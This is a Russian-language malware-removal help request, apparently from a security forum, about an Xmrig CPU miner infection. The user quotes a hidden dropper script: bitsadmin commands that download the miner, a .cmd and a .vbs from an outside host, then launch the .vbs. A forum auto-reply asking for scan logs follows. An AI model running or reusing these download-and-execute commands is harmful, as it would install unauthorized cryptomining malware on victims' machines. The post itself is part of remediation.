Xmrig32.exe CPU Miner с автозакачкой файлов. Как удалить?
Недавно появился CPU Miner с автозакачкой файлов. Как удалить? Ничего лишнего не устанавливал, не скачивал, на сайты не заходил. Находятся файлы в папке C:\Users\Андрей\AppData\Roaming\AppData. Один скрытый файл .tmp со строкам закачки файлов с сайта.
Вот эти строки прописаны в нём
Код:
bitsadmin /transfer /download /priority high "http://getshlink.in/m/f/xmrig32.exe" "%cd%\xmrig32.exe"
bitsadmin /transfer /download /priority high "http://getshlink.in/m/f/example32.cmd" "%cd%\example32.cmd"
bitsadmin /transfer /download /priority high "http://getshlink.in/m/f/32.vbs" "%cd%\32.vbs"
start 32.vbs
Последний раз редактировалось Sarpix; 19.05.2017 в 12:56.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) Sarpix, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.